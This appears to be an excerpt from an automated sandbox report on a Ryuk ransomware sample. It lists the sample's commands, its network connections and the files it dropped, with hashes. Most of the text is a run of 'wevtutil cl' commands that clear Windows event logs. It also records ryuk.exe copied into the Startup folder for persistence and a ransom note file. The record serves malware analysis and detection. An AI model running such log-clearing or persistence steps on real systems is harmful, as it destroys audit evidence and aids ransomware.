wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LSA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LSA/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
NL 154.61.71.51:445 tcp
NL 154.61.71.51:139 tcp
N/A 10.127.0.1:139 tcp
NL 104.80.225.205:443 tcp
US 20.189.173.4:443 tcp
US 204.79.197.200:443 tcp

Files

C:\ProgramData\ryuk.exe

MD5 a650d5676dc2c91a3af2216044ddaf8c
SHA1 851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512 463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 a650d5676dc2c91a3af2216044ddaf8c
SHA1 851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512 463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 118c205ef5313a3fdb2195f7cc85d574
SHA1 84366eb25bb1b71cad79603d94c831861db9a582
SHA256 6de10925f82b523bc9ee4631cccf80c70f7fa94f742d4ea0576dcc46bbf25705
SHA512 7eb2b8c0c0abdbf51b3b1c137ad04437b7e0430cfdebca6a7a9a1eaedda7303da3e6757c36086a789351c6988421abb8ecfa34e90a3176485d5f0b6047912c3a

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 e1999233b020758432af3c258bc3e09f
SHA1 88a38f466361594481e5e21b9de7711b9ffe78c2
SHA256 6b5b69a916711b5c4ab9cfd1f63bbb40750a16e4d7af1239ece92ceb754d2458
SHA512 b98e9cf86ebb01692be89359021af0ddcfe27a9ecd41ed7d4cae749b72b014d49ef250654801b6d8dfce9fa9186583450c8963ed148bcc56ca8201bd4bb1b4c0

C:\ProgramData\hrmlog1

MD5 e1999233b020758432af3c258bc3e09f
SHA1 88a38f466361594481e5e21b9de7711b9ffe78c2
SHA256 6b5b69a916711b5c4ab9cfd1f63bbb40750a16e4d7af1239ece92ceb754d2458
SHA512 b98e9cf86ebb01692be89359021af0ddcfe27a9ecd41ed7d4cae749b72b014d49ef250654801b6d8dfce9fa9186583450c8963ed148bcc56ca8201bd4bb1b4c0

C:\ProgramData\hrmlog2

MD5 118c205ef5313a3fdb2195f7cc85d574
SHA1 84366eb25bb1b71cad79603d94c831861db9a582
SHA256 6de10925f82b523bc9ee4631cccf80c70f7fa94f742d4ea0576dcc46bbf25705
SHA512 7eb2b8c0c0abdbf51b3b1c137ad04437b7e0430cfdebca6a7a9a1eaedda7303da3e6757c36086a789351c6988421abb8ecfa34e90a3176485d5f0b6047912c3a

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 e13a72908ef887edf8806393451e6bac
SHA1 d42723ce3121fc41db2c3e1ae67e3756fd8e784a
SHA256 92e0b3516953912aaec77f3244ecef9569b2cb07c047d5467ac3a31a0fd0d3b8
SHA512 7be985395b0d9e1c39af22c30fcfe696725c63003296b06e14f944810860dbbf6cd401d6e0bc40b2c1155e16b08727b95fa66d618a6e71116ac781fda4cfbf11

C:\ProgramData\RYUKID

MD5 e13a72908ef887edf8806393451e6bac
SHA1 d42723ce3121fc41db2c3e1ae67e3756fd8e784a
SHA256 92e0b3516953912aaec77f3244ecef9569b2cb07c047d5467ac3a31a0fd0d3b8
SHA512 7be985395b0d9e1c39af22c30fcfe696725c63003296b06e14f944810860dbbf6cd401d6e0bc40b2c1155e16b08727b95fa66d618a6e71116ac781fda4cfbf11

C:\ProgramData\RyukReadMe.txt

MD5 e5776afce2e7d6fa4feb7a0c4bc2e004
SHA1 8b3cd15a7e34d4b1c0800dad92a07c60647f44dd
SHA256 4ce8d384cf4f82223dde53c4fe9e9e4a249140068ecc9146b6d68c14278a3be7
SHA512 d03dafeae3ccced40bc20dcbc5cfffc13ec01b163d0d7ff5291c088f3e56971645837a0f3405c32fc6467a2d39d2396645b3eac0b2076d88a3110c42b53cd7c6
